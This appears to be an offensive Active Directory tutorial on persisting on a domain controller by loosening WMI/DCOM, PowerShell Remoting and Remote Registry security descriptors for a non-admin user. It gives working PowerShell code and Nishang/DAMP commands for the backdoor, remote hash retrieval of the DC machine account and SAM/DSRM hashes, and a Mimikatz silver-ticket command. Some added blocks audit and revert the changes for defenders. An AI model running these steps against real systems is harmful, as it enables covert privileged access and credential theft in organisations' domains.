# Modifying Remote Protocol Security Descriptors

This is an interesting way to obtain persistence because the ACLs (security descriptors) of the remoting protocols are rarely audited: they are not tied to group membership, so they survive password resets and a clean-up of the obvious admin groups.

You need administrative rights on the target to change these descriptors (Domain Admin when the target is a DC). Once they are modified, a non-admin user gets access to things like WMI, PowerShell Remoting and the Remote Registry on the DC without being made a Domain Admin.

That user can then execute commands on the DC despite not being an admin.

## Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

### Step 1 - In Component Services, Change the DCOM Permissions of the Computer

* Give the user Remote Access permissions

![](/files/fkNMZGvVVTOKHvmMTNyM)

* Then give the user all Launch and Activation permissions (local and remote)

![](/files/ze4kfBlEn8fmmvwsesYo)

### Step 2 - Modify the WMI Namespace Settings in Computer Management

* Give the user full rights over the root WMI namespace

![](/files/aut3SNZ6wScPrPnZVU2b)

* Then make sure those rights apply to all of the child namespaces as well (in the advanced view, "This namespace and subnamespaces")

![](/files/LHW6oKbqM6KscF9PQYx6)

### Step 3 - Check the Access of the Non-Admin User to the DC

```powershell
PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 14393
RegisteredUser  : Windows User
SerialNumber    : 00377-80000-00000-AA805
Version         : 10.0.14393
```

Now our user can query WMI on the DC and, with the same rights, execute commands through it (for example with `Invoke-WmiMethod -Class Win32_Process -Name Create`).
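The same two steps done from PowerShell, with a read-back of the resulting ACEs so the change can be audited, as an added example. This is not code from the page or from the Nishang script; it assumes you run it as an administrator of the target, that `<dc>` and `DOMAIN\user` are placeholders for your own values, that the rights table is the set of checkboxes the WMI Control security dialog shows, and (my reading of Step 1) that the Component Services dialog edits the machine-wide `MachineAccessRestriction` / `MachineLaunchRestriction` limits under `HKLM\SOFTWARE\Microsoft\Ole`.

```powershell
# Added example: Step 1 (DCOM machine-wide limits) and Step 2 (WMI namespace
# DACL) from PowerShell, plus a read-back for auditing.
# Assumes: run as an administrator of the target; '<dc>' and 'DOMAIN\user'
# are placeholders.

# WMI namespace rights, i.e. the checkboxes of the WMI Control security
# dialog (the WBEM_* access bits).
$WmiRight = [ordered]@{
    EnableAccount = 0x1;  MethodExecute = 0x2;  FullWrite    = 0x4;     PartialWrite = 0x8
    ProviderWrite = 0x10; RemoteEnable  = 0x20; ReadSecurity = 0x20000; EditSecurity = 0x40000
}
$WmiFullControl   = 0x6003F   # all of the above, what the dialog's Full Control grants
$ContainerInherit = 0x2       # ACE flag: also applies to child namespaces

# The DCOM limits use COM access bits instead (assumption: the Step 1 dialog
# writes these; the "Edit Default" values live beside them as
# DefaultAccessPermission / DefaultLaunchPermission).
$DcomAccessRight = [ordered]@{ LocalAccess = 0x2; RemoteAccess = 0x4 }
$DcomLaunchRight = [ordered]@{ LocalLaunch = 0x2; RemoteLaunch = 0x4; LocalActivation = 0x8; RemoteActivation = 0x10 }

function ConvertTo-RightNames([int]$Mask, [System.Collections.IDictionary]$Table) {
    ($Table.GetEnumerator() | Where-Object { ($Mask -band $_.Value) -ne 0 } | ForEach-Object { $_.Name }) -join ','
}

function Get-WmiNamespaceAce {
    # Lists the DACL of a namespace through the __SystemSecurity singleton.
    param([string]$ComputerName = '.', [string]$Namespace = 'root')
    $sd = (Invoke-WmiMethod -ComputerName $ComputerName -Namespace $Namespace `
              -Path '__SystemSecurity=@' -Name GetSecurityDescriptor).Descriptor
    foreach ($ace in $sd.DACL) {
        [pscustomobject]@{
            Namespace = $Namespace
            Trustee   = $(if ($ace.Trustee.Name) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.SIDString })
            Type      = $(if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' })
            Inherits  = (($ace.AceFlags -band $ContainerInherit) -ne 0)
            Rights    = ConvertTo-RightNames $ace.AccessMask $WmiRight
        }
    }
}

function Add-WmiNamespaceAce {
    # Step 2: append an allow ACE for $Account to the namespace DACL.
    param([string]$ComputerName, [string]$Account, [string]$Namespace = 'root',
          [int]$AccessMask = $WmiFullControl, [switch]$InheritToChildren)
    $sid = (New-Object System.Security.Principal.NTAccount($Account)).Translate(
               [System.Security.Principal.SecurityIdentifier]).Value
    $target = @{ ComputerName = $ComputerName; Namespace = $Namespace; Path = '__SystemSecurity=@' }
    $sd = (Invoke-WmiMethod @target -Name GetSecurityDescriptor).Descriptor

    $trustee = ([wmiclass]'Win32_Trustee').CreateInstance()
    $trustee.SidString = $sid
    $ace = ([wmiclass]'Win32_Ace').CreateInstance()
    $ace.AccessMask = $AccessMask
    $ace.AceType    = 0                    # ACCESS_ALLOWED_ACE_TYPE
    $ace.AceFlags   = $(if ($InheritToChildren) { $ContainerInherit } else { 0 })
    $ace.Trustee    = $trustee
    $sd.DACL += $ace.PSObject.ImmediateBaseObject

    $result = Invoke-WmiMethod @target -Name SetSecurityDescriptor -ArgumentList $sd.PSObject.ImmediateBaseObject
    if ($result.ReturnValue -ne 0) { throw "SetSecurityDescriptor failed with $($result.ReturnValue)" }
}

function Get-DcomMachineRestriction {
    # Step 1 read-back: decode the machine-wide DCOM access/launch limits.
    # A missing value means Windows defaults apply and nothing is returned for it.
    param([string]$ComputerName = '.')
    $hklm   = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    $ole    = $hklm.OpenSubKey('SOFTWARE\Microsoft\Ole')
    $limits = @{ MachineAccessRestriction = $DcomAccessRight; MachineLaunchRestriction = $DcomLaunchRight }
    foreach ($limit in $limits.GetEnumerator()) {
        $bytes = $ole.GetValue($limit.Key)
        if (-not $bytes) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
        foreach ($ace in $sd.DiscretionaryAcl) {
            [pscustomobject]@{
                Limit   = $limit.Key
                Trustee = $ace.SecurityIdentifier.Value
                Type    = $ace.AceType
                Rights  = ConvertTo-RightNames $ace.AccessMask $limit.Value
            }
        }
    }
}

# Usage, mirroring the GUI walkthrough (edit the DCOM limits in dcomcnfg, then):
# Add-WmiNamespaceAce -ComputerName '<dc>' -Account 'DOMAIN\user' -InheritToChildren
# Get-WmiNamespaceAce -ComputerName '<dc>' | Where-Object { $_.Trustee -notmatch 'Administrators|SYSTEM|SERVICE|Authenticated Users' }
# Get-DcomMachineRestriction -ComputerName '<dc>'
```

The `Where-Object` filter in the usage comment is the audit a defender wants: a stock `root` namespace only carries Administrators, SYSTEM, LOCAL/NETWORK SERVICE and Authenticated Users, so any other trustee with `RemoteEnable` and `MethodExecute` is worth explaining. Remember to run `Get-WmiNamespaceAce` against `root\cimv2` too, since a backdoor may be placed on a child namespace without touching `root`.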

## Giving a User Access to WMI From PowerShell

### With Set-RemoteWMI.ps1 (from Nishang)

```powershell
. .\Set-RemoteWMI.ps1

# Run as a Domain Admin, or pass -Credential; the script modifies the DCOM
# permissions and the namespace security descriptor on the target.
Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -Verbose [-Credential <Domain Admin>]
```

Then log in as that user and check the access:

```powershell
Get-WmiObject -Class win32_operatingsystem -ComputerName <dc>
```

### To Remove the Modified Descriptor

```powershell
# Same parameters plus -Remove: strips the ACE that was added for <user>
Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -Verbose -Remove [-Credential <Domain Admin>]
```

## Change the PowerShell Remoting Descriptors

### With Set-RemotePSRemoting.ps1 (from Nishang)

```powershell
. .\Set-RemotePSRemoting.ps1

# Run with admin rights on <dc>; gives <user> access to the remoting endpoint
Set-RemotePSRemoting -UserName <user> -ComputerName <dc> -Verbose
```

### Then Execute Commands Remotely on the DC

```powershell
# In a session running as <user>
Invoke-Command -ComputerName <dc> -ScriptBlock {<command>}
```
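What Set-RemotePSRemoting changes is the security descriptor (SDDL) of the remoting endpoint. As an added example, not code from the page or from Nishang, here is that edit done by hand with .NET's security-descriptor classes, together with an audit of who is allowed in. It assumes you run it on the DC as an administrator, that `Microsoft.PowerShell` is the endpoint of interest (64-bit hosts also have `Microsoft.PowerShell32`), and that `DOMAIN\user` is a placeholder.

```powershell
# Added example: decode the Microsoft.PowerShell endpoint SDDL, append a Full
# Control ACE for one account, and flag trustees that should not be there.
# Assumes: run on the DC as an administrator; 'DOMAIN\user' is a placeholder.

$GenericAll = 0x10000000    # SDDL 'GA': Full Control on the endpoint
# Trustees a stock Microsoft.PowerShell endpoint allows: Administrators,
# Remote Management Users and INTERACTIVE (the latter only for loopback).
$ExpectedSid = 'S-1-5-32-544', 'S-1-5-32-580', 'S-1-5-4'

function ConvertTo-Sid([string]$Account) {
    # Accepts 'DOMAIN\user' or an S-1-... string (no name resolution needed).
    if ($Account -match '^S-1-') { return New-Object System.Security.Principal.SecurityIdentifier($Account) }
    (New-Object System.Security.Principal.NTAccount($Account)).Translate([System.Security.Principal.SecurityIdentifier])
}

function Get-EndpointAce {
    # One object per DACL entry of the endpoint SDDL.
    param([string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid.Value }
        [pscustomobject]@{
            Sid         = $sid.Value
            Trustee     = $name
            Type        = $ace.AceType
            FullControl = (($ace.AccessMask -band $GenericAll) -ne 0)
            Expected    = ($sid.Value -in $ExpectedSid)
        }
    }
}

function Add-EndpointFullControl {
    # Returns the SDDL with an (A;;GA;;;<sid>) entry appended for $Account,
    # which is the change Set-RemotePSRemoting makes for its -UserName.
    param([string]$Sddl, [string]$Account)
    $sid = ConvertTo-Sid $Account
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    $ace = New-Object System.Security.AccessControl.CommonAce(
               [System.Security.AccessControl.AceFlags]::None,
               [System.Security.AccessControl.AceQualifier]::AccessAllowed,
               $GenericAll, $sid, $false, $null)
    $sd.DiscretionaryAcl.InsertAce($sd.DiscretionaryAcl.Count, $ace)
    $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
}

function Find-UnexpectedEndpointTrustee {
    # Audit view: allow entries for anyone outside the expected built-in groups.
    param([string]$Sddl)
    Get-EndpointAce -Sddl $Sddl | Where-Object {
        $_.Type -eq [System.Security.AccessControl.AceType]::AccessAllowed -and -not $_.Expected
    }
}

# Usage on the DC. Set-PSSessionConfiguration restarts WinRM, so run it from a
# local console rather than from the remoting session you want to keep.
# $cur = (Get-PSSessionConfiguration -Name Microsoft.PowerShell).SecurityDescriptorSddl
# $new = Add-EndpointFullControl -Sddl $cur -Account 'DOMAIN\user'
# Set-PSSessionConfiguration -Name Microsoft.PowerShell -SecurityDescriptorSddl $new -Force
# Find-UnexpectedEndpointTrustee -Sddl (Get-PSSessionConfiguration -Name Microsoft.PowerShell).SecurityDescriptorSddl
```

For the audit, run `Find-UnexpectedEndpointTrustee` over every configuration returned by `Get-PSSessionConfiguration`, not just the default endpoint: a custom or JEA endpoint with a generous SDDL is the same backdoor under a different name.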

## Changing the Remote Registry to Add a Backdoor and Retrieve Hashes

### Step 1 - With Add-RemoteRegBackdoor.ps1 (from DAMP)

```powershell
. .\Add-RemoteRegBackdoor.ps1

Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user>
```

### Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1

```powershell
. .\RemoteHashRetrieval.ps1

# Get the DC machine account hash
Get-RemoteMachineAccountHash -ComputerName <dc> -Verbose

# Dump the local SAM hashes (on a DC these include the DSRM Administrator)
Get-RemoteLocalAccountHash -ComputerName <dc> -Verbose
```
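The backdoor works by loosening the ACLs of a handful of registry keys, so the counterpart a defender wants is a read-back of exactly those ACLs and a way to revert them. The block below is an added example, not DAMP's code; the key list is my assumption of what a remote hash retrieval of this kind has to read (the remote registry access key, the boot key pieces, SAM, LSA secrets and cached logons), so compare it with the script before relying on it. It assumes you run it as an administrator of the target and that the Remote Registry service is reachable when `-ComputerName` is not the local host.

```powershell
# Added example: audit and revert the registry key ACLs a remote-registry
# backdoor of this kind relies on. Not DAMP's code; the key list is an
# assumption (compare with Add-RemoteRegBackdoor.ps1).
# Assumes: run as an administrator of the target; Remote Registry reachable
# for a remote $ComputerName; '<dc>' and 'DOMAIN\user' are placeholders.

$BackdoorKeys = @(
    'SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'   # who may use remote registry at all
    'SYSTEM\CurrentControlSet\Control\Lsa\JD'                      # boot key pieces (JD, Skew1, GBG, Data)
    'SYSTEM\CurrentControlSet\Control\Lsa\Skew1'
    'SYSTEM\CurrentControlSet\Control\Lsa\GBG'
    'SYSTEM\CurrentControlSet\Control\Lsa\Data'
    'SAM\SAM\Domains\Account'                                      # local account hashes
    'SECURITY\Policy\PolEKList'                                    # LSA key
    'SECURITY\Policy\Secrets'                                      # machine account password and other secrets
    'SECURITY\Cache'                                               # cached domain logons
)
# Built-in principals normally present on those keys (SYSTEM, Administrators,
# Backup Operators, LOCAL SERVICE, CREATOR OWNER); treat as a starting point.
$ExpectedSid = 'S-1-5-18', 'S-1-5-32-544', 'S-1-5-32-551', 'S-1-5-19', 'S-1-3-0'

function Open-RemoteHklm([string]$ComputerName) {
    [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
}

function Get-BackdoorKeyAce {
    param([string]$ComputerName = '.', [string[]]$Keys = $BackdoorKeys)
    $hklm = Open-RemoteHklm $ComputerName
    foreach ($path in $Keys) {
        # READ_CONTROL is enough to read DACL and owner, and is what
        # Administrators still hold on the SAM and SECURITY hives.
        $key = $hklm.OpenSubKey($path, [Microsoft.Win32.RegistryKeyPermissionCheck]::Default,
                                [System.Security.AccessControl.RegistryRights]::ReadPermissions)
        if (-not $key) { Write-Warning "$path not found or not readable"; continue }
        $acl   = $key.GetAccessControl([System.Security.AccessControl.AccessControlSections]::Access -bor
                                       [System.Security.AccessControl.AccessControlSections]::Owner)
        $owner = $acl.GetOwner([System.Security.Principal.SecurityIdentifier]).Value
        foreach ($rule in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            $sid = $rule.IdentityReference.Value
            [pscustomobject]@{
                Key = $path; Owner = $owner; Sid = $sid
                Type = $rule.AccessControlType; Rights = $rule.RegistryRights
                Inherited = $rule.IsInherited; Suspect = ($sid -notin $ExpectedSid)
            }
        }
        $key.Close()
    }
}

function Remove-BackdoorKeyAce {
    # Reverts the backdoor: drops every explicit ACE for $Trustee on the keys.
    # Ownership is only reported by Get-BackdoorKeyAce; a key owned by the
    # trustee needs its owner reset to Administrators as well.
    param([string]$ComputerName = '.', [string]$Trustee, [string[]]$Keys = $BackdoorKeys)
    $sid  = (New-Object System.Security.Principal.NTAccount($Trustee)).Translate([System.Security.Principal.SecurityIdentifier])
    $hklm = Open-RemoteHklm $ComputerName
    foreach ($path in $Keys) {
        $key = $hklm.OpenSubKey($path, [Microsoft.Win32.RegistryKeyPermissionCheck]::Default,
                                [System.Security.AccessControl.RegistryRights]::ReadPermissions -bor
                                [System.Security.AccessControl.RegistryRights]::ChangePermissions)
        if (-not $key) { continue }
        $acl = $key.GetAccessControl([System.Security.AccessControl.AccessControlSections]::Access)
        $acl.PurgeAccessRules($sid)
        $key.SetAccessControl($acl)
        $key.Close()
    }
}

# Usage:
# Get-BackdoorKeyAce -ComputerName '<dc>' | Where-Object Suspect
# Remove-BackdoorKeyAce -ComputerName '<dc>' -Trustee 'DOMAIN\user'
```

The `Owner` column matters as much as the ACEs: a tool that needs to write a DACL it is not allowed to touch takes ownership first, and `PurgeAccessRules` leaves ownership alone, so a key still owned by the trustee can simply be re-backdoored.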

### Step 3 - Exploit

* With the DC machine account hash we can create Silver Tickets for any service on the DC; one for `LDAP` is enough to run DCSync as `Administrator`.

```powershell
# Silver ticket: a forged TGS for one service (CIFS, HOST, LDAP, ...) on the DC,
# signed with the DC's machine account key, injected into the current session
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc-fqdn> /service:<service> /rc4:<dc-machine-account-hash> /user:Administrator /ptt"'
```

* The local Administrator hash of a DC is its DSRM password. Once `DsrmAdminLogonBehavior` is set to 2 it can be used for pass-the-hash against the DC, and from that foothold the domain's credentials can be dumped.
